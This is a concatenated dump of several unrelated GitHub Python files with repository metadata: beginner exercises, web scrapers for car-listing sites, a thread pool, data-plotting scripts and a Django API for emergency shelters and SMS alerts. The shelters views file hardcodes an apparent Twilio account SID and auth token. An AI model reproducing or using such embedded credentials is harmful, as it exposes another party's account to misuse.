Return validation error if it fails.\n try:\n decoded_file = base64.b64decode(data+'==')\n except TypeError:\n self.fail('invalid_image')\n\n # Generate file name:\n file_name = str(uuid.uuid4())[:12] # 12 characters are more than enough.\n # Get the file name extension:\n file_extension = self.get_file_extension(file_name, decoded_file)\n\n complete_file_name = \"%s.%s\" % (file_name, file_extension, )\n\n data = ContentFile(decoded_file, name=complete_file_name)\n\n return super(Base64ImageField, self).to_internal_value(data)\n\n def get_file_extension(self, file_name, decoded_file):\n import imghdr\n\n extension = imghdr.what(file_name, decoded_file)\n extension = \"jpg\" if extension == \"jpeg\" else extension\n\n return extension\n\nclass CategorySerializer(serializers.ModelSerializer):\n class Meta:\n model = models.Category\n fields = ['category_name']\n \n\nclass PostSerializer(serializers.ModelSerializer):\n author = UserSerializer(read_only=True)\n header_image = Base64ImageField(\n max_length=None, use_url=True,required=False,allow_null=True,\n )\n class Meta:\n model = models.Post\n fields = ['author','title','post_Video','title_tag','category_name','header_image','body','created','total_likes']\n extra_kwargs = {'total_likes':{'read_only':True}}\n \n def create(self, validated_data):\n validated_data['author'] = self.context['request'].user\n title = self.context['request'].data['title_tag']\n instance = models.Post.objects.create(**validated_data)\n instance.set_title_tag(title)\n messages.success(self.context['request'],'New Post Has Been Created.')\n return instance\n\n\nclass PostSerializerDetail(serializers.ModelSerializer):\n author = UserSerializer(read_only=True)\n header_image = Base64ImageField(\n max_length=None, use_url=True,required=False,allow_null=True,\n )\n class Meta:\n model = models.Post\n fields = ['author','title','title_tag','category_name','post_Video','header_image','body','created','total_likes']\n extra_kwargs = {'author': {'read_only': True},'total_likes': {'read_only': True},'title':{'read_only': True},'title_tag':{'read_only': True}}\n \n \n def update(self,instance, validated_data):\n messages.success(self.context['request'],'Post Has Been Updated.')\n if 'category_name' in validated_data:\n instance.category_name = validated_data['category_name']\n if 'header_image' in validated_data:\n instance.header_image = validated_data['header_image']\n if 'post_Video' in validated_data:\n instance.post_Video = validated_data['post_Video']\n if 'title_tag' in self.context['request'].data:\n print(\"title_tag\")\n instance.set_title_tag(self.context['request'].data['title_tag'])\n if 'body' in validated_data:\n instance.body=validated_data['body']\n return instance\n","repo_name":"iMu21/MyBlog-API","sub_path":"theBlog/serializers/blogs.py","file_name":"blogs.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43570511809","text":"import pandas as pd\r\nimport numpy as np\r\n\r\n\r\nclass Strategy:\r\n\r\n def __init__(self, hard=None, soft=None, src_hard=None, src_soft=None):\r\n # Get strategy table for player not having a usable ace\r\n if src_hard is not None:\r\n self.hard = pd.read_csv(src_hard, index_col=0).values\r\n elif hard is not None:\r\n self.hard = hard\r\n else:\r\n # Initialize table and set last row (player's sum is 21) to all 0s (=stick)\r\n self.hard = np.zeros((18, 10), dtype=np.int8)\r\n self.hard[:-1, :] = 0\r\n # Get strategy table 
for player having a usable ace\r\n if src_soft is not None:\r\n self.soft = pd.read_csv(src_soft, index_col=0).values\r\n elif soft is not None:\r\n self.soft = soft\r\n else:\r\n # Initialize table and set last row (player's sum is 21) to all 0s (=stick)\r\n self.soft = np.zeros((10, 10), dtype=np.int8)\r\n self.soft[:-1, :] = 0\r\n\r\n def action(self, players_sum, dealers_card, usable_ace):\r\n # Read action from strategy table\r\n if usable_ace:\r\n return self.soft[min(players_sum - 12, 9), dealers_card - 1]\r\n else:\r\n return self.hard[min(players_sum - 4, 17), dealers_card - 1]\r\n\r\n def match(self, strategy_compare):\r\n # Get strategy tables\r\n tables = np.concatenate([self.hard, self.soft])\r\n tables_compare = np.concatenate([strategy_compare.hard, strategy_compare.soft])\r\n # Iterate over indices\r\n sum_match = 0\r\n for i in range(tables.shape[0]):\r\n for j in range(tables.shape[1]):\r\n values = {tables[i, j], tables_compare[i, j]}\r\n # If primary and secondary action are equal, add 1 to comparisons\r\n if len(values) == 1:\r\n sum_match += 1\r\n # If only one of them matches the other, add 0.5\r\n elif values == {2, 4} or values == {3, 6}:\r\n sum_match += 0.5\r\n elif values == {0, 2} or values == {0, 3} or values == {1, 4} or values == {1, 6}:\r\n sum_match += 0.5\r\n elif values == {2, 3} or values == {4, 6}:\r\n sum_match += 0.5\r\n # Return the mean of comparisons\r\n return sum_match / tables.size\r\n\r\n def output(self, target_hard=None, target_soft=None):\r\n # Store string data in dictionaries\r\n data_hard, data_soft = {}, {}\r\n symbols = {0: 'S', 1: 'H', 2: 'DS', 3: 'RS', 4: 'DH', 6: 'RH'}\r\n for dealers_card in range(1, 10):\r\n column_name = 'A' if dealers_card == 1 else '{:02d}'.format(dealers_card)\r\n data_hard[column_name] = [symbols[a] for a in self.hard[:, dealers_card - 1]]\r\n data_soft[column_name] = [symbols[a] for a in self.soft[:, dealers_card - 1]]\r\n # Create pandas data frames from dictionaries\r\n df_hard = pd.DataFrame(data_hard, index=['{:02d}'.format(c) for c in range(4, 22)])\r\n df_soft = pd.DataFrame(data_soft, index=range(12, 22))\r\n # Print data frames\r\n print('Hard:\\n{}\\n\\nSoft:\\n{}'.format(df_hard.to_string(), df_soft.to_string()))\r\n # Export data frames to csv files\r\n if target_hard is not None:\r\n df_hard.to_csv(target_hard)\r\n if target_soft is not None:\r\n df_soft.to_csv(target_soft)\r\n","repo_name":"carlosgoe/blackjack-rl","sub_path":"blackjack_strategy.py","file_name":"blackjack_strategy.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"27146125009","text":"'''\nCreate a function named EVEN that will take 2 int parameters.\none for starting point and the other is a counter.\nreturn a list of counter smallest even int\ngreater than or equal to starting point in ascending order\n'''\n\n\ndef even(start, times):\n\n numList =[]\n\n for i in range(start, start+times*2):\n if i%2==0:\n numList.append(i)\n print(numList)\n\ndef even2(start, n):\n if start%2 == 0:\n start = start\n else:\n start = start + 1\n\n newList = []\n i = 0\n while i < n:\n newList.append(start)\n start = start +2\n i = i+1\n print(newList)\n\neven(2,3)\neven2(2,3)\n\n\n# if __name__ == '__main__':\n# even(2,3)\n# 
even2(2,3)\n\n\n\n","repo_name":"eminegit/homeworkNov30","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27521318168","text":"import http.client\nimport urllib.parse\n\n\nclass Request:\n content = ''\n status = ''\n reason = ''\n host = '172.20.204.65:81'\n headers = {'Content-type': 'application/x-www-form-urlencoded',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)',\n }\n error = ''\n\n def httpSend(self, req):\n if not self.checkReq(req):\n return False\n\n url = req['url']\n post = 'post' in req and req['post'] or ''\n\n coon = http.client.HTTPConnection(self.host)\n if post:\n post = self.parsePost(post)\n params = urllib.parse.urlencode(post)\n coon.request('POST', url, params, headers=self.headers)\n else:\n coon.request('GET', url, headers=self.headers)\n response = coon.getresponse()\n self.status = response.status\n self.reason = response.reason\n self.content = response.read()\n coon.close()\n\n def isConnectSuccess(self):\n return self.status == 200\n\n def getContent(self):\n return self.content\n\n def checkReq(self, req):\n if 'url' not in req:\n self.error = '请求url错误'\n return False\n else:\n return True\n\n def reset(self):\n self.content = ''\n self.status = ''\n self.reason = ''\n self.error = ''\n\n @staticmethod\n def parsePost(params):\n if not params:\n return None\n\n if isinstance(params, dict):\n return params\n\n post = {}\n paramsArr = params.split('&')\n for rq in paramsArr:\n poz = rq.find('=')\n name = rq[0:poz]\n content = rq[poz + 1:]\n post[name] = content\n\n return post\n\n","repo_name":"bafnmhm/api-tester","sub_path":"inc/Request.py","file_name":"Request.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70704958822","text":"def solution(s):\n answer = 1001\n if len(s) == 1:\n return 1\n for leng in range(1, len(s)//2+1):\n s_copy = s\n madeStrings = []\n while s_copy:\n sliced = s_copy[:leng]\n s_copy = s_copy[leng:]\n if madeStrings:\n if madeStrings[-1][1] == sliced:\n madeStrings[-1][0] += 1\n else:\n madeStrings.append([1, sliced])\n else:\n madeStrings.append([1, sliced])\n curLenAnswer = 0\n for element in madeStrings:\n curLenAnswer += len(element[1]) + (element[0] > 1) * len(str(element[0]))\n answer = min(answer, curLenAnswer)\n return answer","repo_name":"dohyun93/python_playground","sub_path":"section12_(유형)_구현 문제들/12-3.문자열 압축(카카오2020).py","file_name":"12-3.문자열 압축(카카오2020).py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11544837858","text":"from marshmallow import Schema, fields, post_load\nfrom typing import Any, Dict, Iterable, List, Optional, Set\nfrom .base import Base\n\n\nclass Table(Base):\n TYPE = 'table'\n\n def __init__(self, *,\n name: str,\n key: str,\n description: str,\n cluster: str,\n database: str,\n schema_name: str,\n column_names: Iterable[str],\n column_descriptions: List[str] = [],\n tags: Iterable[str],\n last_updated_epoch: int,\n display_name: Optional[str] = None,\n total_usage: int = 0) -> None:\n self.name = name\n self.key = key\n self.description = description\n self.cluster = cluster\n 
self.database = database\n self.schema_name = schema_name\n self.column_names = column_names\n self.tags = tags\n self.last_updated_epoch = last_updated_epoch\n self.total_usage = total_usage\n self.column_descriptions = column_descriptions\n self.display_name = display_name\n\n def get_id(self) -> str:\n # uses the table key as the document id in ES\n return self.key\n\n @classmethod\n def get_attrs(cls) -> Set:\n return {\n 'name',\n 'key',\n 'description',\n 'cluster',\n 'database',\n 'schema_name',\n 'column_names',\n 'tags',\n 'last_updated_epoch',\n 'display_name'\n }\n\n def __repr__(self) -> str:\n return 'Table(name={!r}, key={!r}, description={!r}, ' \\\n 'cluster={!r} database={!r}, schema_name={!r}, column_names={!r}, ' \\\n 'tags={!r}, last_updated={!r}, display_name={!r})'.format(self.name,\n self.key,\n self.description,\n self.cluster,\n self.database,\n self.schema_name,\n self.column_names,\n self.tags,\n self.last_updated_epoch,\n self.display_name)\n\n\nclass TableSchema(Schema):\n database = fields.Str()\n cluster = fields.Str()\n column_names = fields.List(fields.Str())\n schema_name = fields.Str()\n name = fields.Str()\n key = fields.Str()\n description = fields.Str()\n last_updated_epoch = fields.Str(allow_none=True)\n tags = fields.List(fields.Str())\n total_usage = fields.Int(allow_none=True)\n column_descriptions = fields.List(fields.Str(), allow_none=True)\n display_name = fields.Str(allow_none=True)\n\n @post_load\n def make(self, data: Dict[str, Any], **kwargs: Any) -> Table:\n return Table(**data)\n","repo_name":"metadataxpress/metadataxpress","sub_path":"amundsensearchlibrary/search_service/models/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37966106663","text":"import urllib.request\nimport urllib.error\n\nif __name__ == '__main__':\n # url = \"http://163.204.244.8\"\n # url = \"http://blog.csdn.net\"\n url =\"https://www.bsssaidu.com\"\n try:\n urllib.request.urlopen(url)\n except urllib.error.URLError as e:\n if hasattr(e, \"code\"):\n print(e.code)\n if hasattr(e, \"reason\"):\n print(e.reason)","repo_name":"youxi0011983/python_study","sub_path":"crawler/DemoURLError2.py","file_name":"DemoURLError2.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10029956324","text":"import psycopg2\nfrom matplotlib import pyplot as plt\nimport configparser\n\n\nconfig = configparser.ConfigParser()\nconfig.read('dwh.cfg')\nconnect = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\ncursor = connect.cursor()\n\ntry:\n cursor.execute(\"SELECT COUNT(level) FROM users WHERE level = 'free'\")\n\nexcept psycopg2.Error as e:\n print(\"Error: select *\")\n print(e)\nno_free_users = cursor.fetchone()[0]\n\n# Get number of paid users\ntry:\n cursor.execute(\"SELECT COUNT(level) FROM users WHERE level = 'paid'\")\nexcept psycopg2.Error as e:\n print(\"Error: select *\")\n print(e)\nno_paid_users = cursor.fetchone()[0]\n\n# Get number of Male users\ntry:\n cursor.execute(\"SELECT COUNT(*) FROM users WHERE gender = 'M'\")\n\nexcept psycopg2.Error as e:\n print(\"Error: select *\")\n print(e)\nno_male_users = cursor.fetchone()[0]\n\n# Get number of Female users\ntry:\n cursor.execute(\"SELECT COUNT(*) FROM users WHERE gender = 'F'\")\n\nexcept psycopg2.Error as e:\n print(\"Error: select 
*\")\n print(e)\nno_female_users = cursor.fetchone()[0]\n\nconnect.close()\n\n# Plotting\nuser_level = [\"Free\", \"Paid\"]\nuser_gender = [\"Male\", \"Female\"]\ndata_level = [no_free_users, no_paid_users]\ndata_gender = [no_male_users, no_female_users]\nplot_data_level = data_level\nplot_data_gender = data_gender\nprint(data_level)\nprint(data_gender)\n\n# Creating plot\nfig = plt.figure(figsize=(10, 10))\nax = fig.add_axes([0, 0, 1, 1])\nfig1 = plt.figure(figsize=(10, 10))\nax1 = fig1.add_axes([0, 0, 1, 1])\n\nax.pie(plot_data_level,\n labels=user_level,\n autopct='%1.1f%%')\nax1.pie(plot_data_gender,\n labels=user_gender,\n autopct='%1.1f%%')\nax.set_title(\"Users Level\", fontsize=20)\nax1.set_title(\"Users Gender\", fontsize=20)\n\n# show plot\nplt.show()\n","repo_name":"xzbits/project3_DE_ND","sub_path":"dashboard_users_insight.py","file_name":"dashboard_users_insight.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43927122453","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\nimport os\n\nURL = 'https://auto.ria.com/newauto/marka-chery/'\nHEADERS = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36',\n 'accept': '*/*'}\nHOST = 'https://auto.ria.com'\nFILE = 'cars.csv'\n\n\ndef get_html(url, params=None):\n r = requests.get(url, headers=HEADERS, params=params)\n return r\n\n\ndef get_content(html):\n soup = BeautifulSoup(html, 'html.parser')\n items = soup.find_all('div', class_='proposition')\n cars = []\n for item in items:\n cars.append({\n 'title': item.find('h3', class_='proposition_name').get_text(strip=True),\n 'link': HOST + item.find('a').get('href'),\n 'usd_price': item.find('span', class_='green').get_text(strip=True),\n })\n return cars\n\n\ndef get_pages_count(html):\n soup = BeautifulSoup(html, 'html.parser')\n pagination = soup.find_all('span', class_='mhide')\n if pagination:\n return int(pagination[-1].get_text())\n return 1\n\n\ndef save_in_file(items, path):\n with open(path, 'w', newline='') as file:\n writer = csv.writer(file, delimiter=';')\n writer.writerow({'Mark', 'Link', 'Price(USD)'})\n for item in items:\n writer.writerow([item['title'], item['link'], item['usd_price']])\n\n\ndef parse():\n URL = input('Input URL: ')\n html = get_html(URL) #if 200 then allright\n if html.status_code == 200:\n cars = []\n pages_count = get_pages_count(html.text)\n for page in range(1, pages_count + 1):\n print(f'Parse pages: {page} of {pages_count}')\n html = get_html(URL, params={'page': page})\n cars.extend(get_content(html.text))\n save_in_file(cars, FILE)\n print(f'Get {len(cars)} auto.')\n os.startfile(FILE)\n else:\n print('Error: status_code.')\n\n\nparse()\n","repo_name":"dimmarvel/parsers_","sub_path":"python parsers/auto.ria/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41836338748","text":"import scrapy\nfrom random import uniform\nfrom time import sleep\n\n\nclass SpiderkolesaSpider(scrapy.Spider):\n name = 'spiderkolesa'\n allowed_domains = ['kolesa.kz']\n start_urls = ['https://kolesa.kz/cars/']\n\n def parse(self, response):\n for i in range(1, 1000):\n url = f'https://kolesa.kz/cars/?page={i}'\n yield scrapy.Request(url, callback=self.parse_page)\n\n def parse_page(self, response):\n for href in 
response.css(\".ddl_product_link::attr('href')\"):\n url = response.urljoin(href.extract())\n sleep(round(uniform(0.2, 0.4), 3))\n yield scrapy.Request(url, callback=self.parse_contents)\n\n def parse_contents(self, response):\n item = dict()\n item['manufacturer'] = response.css('h1 span::text').get().strip()\n item['model'] = response.css('h1 span::text').getall()[1].strip()\n item['year'] = response.css('.year::text').get().strip()\n item['city'] = response.css('dl:nth-child(1) .value::text').get().strip()\n item['body'] = response.css('dl:nth-child(2) .value::text').get().strip()\n item['engine_volume'] = response.css('dl:nth-child(3) .value::text').get().strip()\n item['mileage'] = response.css('dl:nth-child(4) .value::text').get().strip()\n item['transmission'] = response.css('dl:nth-child(5) .value::text').get().strip()\n item['wheel'] = response.css('dl:nth-child(6) .value::text').get().strip()\n item['color'] = response.css('dl:nth-child(7) .value::text').get().strip()\n item['drive'] = response.css('dl:nth-child(8) .value::text').get().strip()\n item['price'] = response.css('.offer__price::text').get().strip()\n yield item\n","repo_name":"Almas-Alz/kolesakz-parser","sub_path":"spiderkolesa.py","file_name":"spiderkolesa.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15566670220","text":"# from random import randint\n\n\n# n = 6\n# c = 1 \n\n# while c!=n:\n# print(c )\n# print(\"*\" * c)\n# # c = c + 1\n# c += 1 \n\n\n# n = int(input(\"Introduceti inaltimea bradului dorit: \"))\n# c = 1 \n\n# while c!=n:\n# # print(c )\n# print(\"*\" * c)\n# # c = c + 1\n# c += 1 \n\n\n# numar_rand = randint (1, 99)\n\n# print(\"Incepe jocul!\")\n# numar = int(input(\"Ghiceste numarul intre 1-99 :\"))\n# while numar != numar_rand:\n# if numar > numar_rand:\n# print (\"-\")\n# else:\n# print (\"+\")\n# numar = int(input(\"Introdu un numar:\"))\n\n# print (\"Ai castigat\")\n\n# r1 = range(10)\n\n# for i in r1:\n# print(i)\n\ncounter = 0\n\nr5 = range(0, 6, 2)\nfor counter in r5:\n counter += 1\n\nprint (counter)\n\n\n","repo_name":"NorbertDozsa/It_Scchool-2023","sub_path":"Sessions/S4/Ex while.py","file_name":"Ex while.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29053195042","text":"class Solution:\n def uniquePaths(self, m: int, n: int) -> int:\n matrix = [[1] * n for _ in range(m)]\n\n for r in range(1, len(matrix)):\n for c in range(1, len(matrix[0])):\n matrix[r][c] = matrix[r-1][c] + matrix[r][c-1]\n\n return matrix[-1][-1]\n\n\n# Time: O(m*n)\n# Space: O(m*n)\n","repo_name":"kutaycinar/leetcode","sub_path":"python/62_unique-paths.py","file_name":"62_unique-paths.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23444104000","text":"# -*- encoding:utf-8 -*-\n\nimport psutil\nimport threading\nfrom operating_system.task import Task, AsyncTask\nfrom operating_system.ThreadSafeQueue import ThreadSafeQueue\n\n\nclass ProcessThread(threading.Thread):\n\n def __init__(self, task_queue, *args, **kwargs):\n threading.Thread.__init__(self)\n self.task_queue = task_queue\n self.dismiss_flag = threading.Event()\n self.args = args\n self.kwargs = kwargs\n\n def run(self):\n while True:\n if self.dismiss_flag.is_set():\n break\n task = self.task_queue.pop()\n if not isinstance(task, 
Task):\n continue\n result = task.callable(*task.args, **task.kwargs)\n if isinstance(task, AsyncTask):\n task.set_result(result)\n\n def dismiss(self):\n self.dismiss_flag.set()\n\n def stop(self):\n self.dismiss()\n\n\nclass ThreadPool:\n\n def __init__(self, size=0):\n if not size:\n size = psutil.cpu_count() * 2\n self.task_queue = ThreadSafeQueue(size)\n self.pool = ThreadSafeQueue()\n for i in range(size):\n self.pool.put(ProcessThread(self.task_queue))\n\n def start(self):\n for i in range(self.size()):\n thread = self.pool.get(i)\n thread.start()\n\n def join(self):\n for i in range(self.size()):\n thread = self.pool.get(i)\n thread.stop()\n\n def put(self, item):\n if not isinstance(item, Task):\n raise TaskTypeError()\n self.task_queue.put(item)\n\n def batch_put(self, item_list):\n if not isinstance(item_list, list):\n item_list = list(item_list)\n for item in item_list:\n self.put(item)\n\n def size(self):\n return self.pool.size()\n\n\nclass TaskTypeError(Exception):\n pass\n","repo_name":"iqer/computer_composition","sub_path":"operating_system/pool.py","file_name":"pool.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30582575708","text":"import pandas as pd\n\n\ndef preprocess_data(path):\n \"\"\"\n Preprocess dataset stored in the following `path`\n\n Parameters:\n ----------\n path: str\n path to the dataset directory.\n\n Return:\n ------\n df: pandas DataFrame\n Preprocessed dateset.\n \"\"\"\n df = pd.read_csv(path, parse_dates=[\"Date\"])\n df.fillna(\"None\", inplace=True)\n df = (df.query(\"Target == 'ConfirmedCases'\")\n .query(\"TargetValue >= 0\"))\n df.drop([\"Id\", \"Target\"], axis=1, inplace=True)\n df.rename(columns={\"TargetValue\": \"Infected\"}, inplace=True)\n df.columns = map(str.lower, df.columns)\n\n return df","repo_name":"Venzel13/ML","sub_path":"COVID-19/preproc.py","file_name":"preproc.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30313556970","text":"from .models import Shelter\nfrom users.models import CustomUser\nfrom django.http import JsonResponse\nfrom users.views import tokens\nfrom django.http import JsonResponse\nfrom geopy.distance import geodesic\nimport json\nfrom twilio.rest import Client\nfrom django.views.decorators.csrf import csrf_exempt\n\n\n\ndef return_shelters(request):\n\n if request.method == 'GET':\n # Check token.\n if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n\n queryset = Shelter.objects.all()\n\n data_q = []\n\n for set in queryset:\n data = {\n \"name\": set.name,\n \"address\": set.address,\n \"capacity\": set.capacity,\n \"functionalities\": set.functionalities,\n \"latitude\": set.latitude,\n \"longitude\": set.longitude,\n \"type\": set.type\n }\n data_q.append(data)\n\n return JsonResponse({\"success\": True, \"safetyPlaces\": data_q})\n \n return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n\ndef get_user(request):\n\n if request.method == \"GET\":\n # Check token.\n if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n \n user = tokens[request.headers[\"Authorization\"]]\n return JsonResponse({\"success\": True, \"name\": user.name, 
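# --- editor's aside ------------------------------------------------------------
# A tiny inline demo (made-up rows, not the real COVID dataset) of the same
# fillna/query/rename chain that preprocess_data() above applies:
import pandas as pd

df = pd.DataFrame({'Target': ['ConfirmedCases', 'Fatalities', 'ConfirmedCases'],
                   'TargetValue': [10, 2, -1]})
df = (df.fillna('None')
        .query("Target == 'ConfirmedCases'")
        .query("TargetValue >= 0")
        .rename(columns={'TargetValue': 'Infected'}))
assert list(df['Infected']) == [10]
# -------------------------------------------------------------------------------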
\"email\": user.email, \"contact\": user.contact})\n \n return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n\ndef shelter_list_view(request):\n\n if request.method == 'GET':\n range_data = json.loads(request.body.decode('utf-8'))\n latitude = range_data['latitude']\n longitude = range_data['longitude']\n range_km = range_data['range']\n\n user_location = (latitude, longitude)\n\n shelters = Shelter.objects.all()\n shelters_within_range = []\n\n for shelter in shelters:\n shelter_location = (shelter.latitude, shelter.longitude)\n dist = geodesic(user_location, shelter_location).km\n\n if dist <= range_km:\n shelters_within_range.append(shelter)\n\n shelter_data = [\n {\n \"name\": shelter.name,\n \"address\": shelter.address,\n \"capacity\": shelter.capacity,\n \"functionalities\": shelter.functionalities,\n \"latitude\": shelter.latitude,\n \"longitude\": shelter.longitude,\n \"type\": shelter.type\n }\n for shelter in shelters_within_range\n ]\n\n return JsonResponse({'shelters': shelter_data})\n \n return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n \n \n@csrf_exempt\ndef emergency_sms(request):\n\n if request.method == 'POST':\n account_sid = 'AC75dfdabe82e41397a479a5686da9e540'\n auth_token = '1c3013ec7e42ae83b2ff34d321958aad'\n \n if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n \n client = Client(account_sid, auth_token)\n data = json.loads(request.body.decode('utf-8'))\n msg_text = f\"{tokens[request.headers['Authorization']].name} is in need of urgent help!If you can't reach out to them, please dial the national emergency number and ask for immediate support! (lat. {str(data['latitude'])}, long. 
{str(data['longitude'])})\"\n        \n        message = client.messages.create(\n            body=msg_text,\n            from_='+12542564967',\n            to=tokens[request.headers[\"Authorization\"]].contact\n        )\n        return JsonResponse({'success':True})\n\n    return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n\n@csrf_exempt\ndef add_friend(request):\n    # Check method.\n    if request.method == \"POST\":\n        # Check token.\n        if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n            return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n        \n        # Check email.\n        data_str = request.body.decode('utf-8')\n        if data_str == \"\":\n            return JsonResponse({\"success\": False, \"error\": \"Invalid data\"})\n        data = json.loads(data_str)\n        if 'email' not in data:\n            return JsonResponse({\"success\": False, \"error\": \"No email received\"})\n        \n        # Check user by email.\n        if not CustomUser.objects.filter(email=data['email'].lower()).exists():\n            return JsonResponse({\"success\": False, \"error\": \"No user with given email exists\"})\n\n        # Add email to user friend list.\n        user = CustomUser.objects.get(email=data['email'].lower())\n        if 'associates' not in user.friend_list:\n            user.friend_list['associates'] = []\n        current_user_email = tokens[request.headers['Authorization']].email\n        if current_user_email in user.friend_list['associates']:\n            return JsonResponse({\"success\": False, \"error\": \"User already registered as associate\"})\n        user.friend_list['associates'].append(current_user_email)\n        user.save()\n        return JsonResponse({\"success\": True})\n\n    return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n\n@csrf_exempt\ndef remove_friend(request):\n    # Check method.\n    if request.method == \"POST\":\n        # Check token.\n        if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n            return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n        \n        # Check email.\n        data_str = request.body.decode('utf-8')\n        if data_str == \"\":\n            return JsonResponse({\"success\": False, \"error\": \"Invalid data\"})\n        data = json.loads(data_str)\n        if 'email' not in data:\n            return JsonResponse({\"success\": False, \"error\": \"No email received\"})\n        \n        user = tokens[request.headers['Authorization']]\n\n        \n        # Check user by email.\n        if 'friends' not in user.friend_list or data['email'].lower() not in user.friend_list['friends']:\n            return JsonResponse({\"success\": False, \"error\": \"Email not in friend list\"})\n\n        # Remove email from user friend list.\n        user.friend_list['friends'].remove(data['email'].lower())\n        user.save()\n        return JsonResponse({\"success\": True})\n\n    return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n\nlocation_data = {}\n\n@csrf_exempt\ndef send_location(request):\n    # Check method.\n    if request.method == \"POST\":\n        # Check token.\n        if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n            return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n        \n        # Check data.\n        data_str = request.body.decode('utf-8')\n        if data_str == \"\":\n            return JsonResponse({\"success\": False, \"error\": \"Invalid data\"})\n        data = json.loads(data_str)\n        if 'latitude' not in data or 'longitude' not in data or 'timestamp' not in data:\n            return JsonResponse({\"success\": False, \"error\": \"Incomplete data\"})\n        \n        user = tokens[request.headers['Authorization']]\n\n        # Store location.\n        location_data[user.email] = {\"latitude\": data['latitude'], \"longitude\": 
data['longitude'], \"timestamp\": data['timestamp']}\n \n return JsonResponse({\"success\": True})\n\n return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n\n@csrf_exempt\ndef get_location(request):\n # Check method.\n if request.method == \"POST\":\n # Check token.\n if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n \n # Check email.\n data_str = request.body.decode('utf-8')\n if data_str == \"\":\n return JsonResponse({\"success\": False, \"error\": \"Invalid data\"})\n data = json.loads(data_str)\n if 'email' not in data:\n return JsonResponse({\"success\": False, \"error\": \"No email received\"})\n email = data['email'].lower()\n \n # Check if email is in location data.\n if email not in location_data:\n return JsonResponse({\"success\": False, \"error\": \"No available data\"})\n\n return JsonResponse({\"success\": True, email: location_data[email]})\n\n return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})\n\n@csrf_exempt\ndef get_associates(request):\n # Check method.\n if request.method == \"GET\":\n # Check token.\n if \"Authorization\" not in request.headers or request.headers[\"Authorization\"] not in tokens:\n return JsonResponse({\"success\": False, \"error\": \"Invalid token\"})\n \n requesting_user = tokens[request.headers[\"Authorization\"]]\n if 'associates' not in requesting_user.friend_list:\n requesting_user.friend_list['associates'] = []\n return JsonResponse({\"success\": True, \"associates\": requesting_user.friend_list['associates']})\n \n return JsonResponse({\"success\": False, \"error\": \"Bad request method\"})","repo_name":"alinichim/CityPulse","sub_path":"server/shelters/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19878850593","text":"\"\"\"Created by Austin Rhee 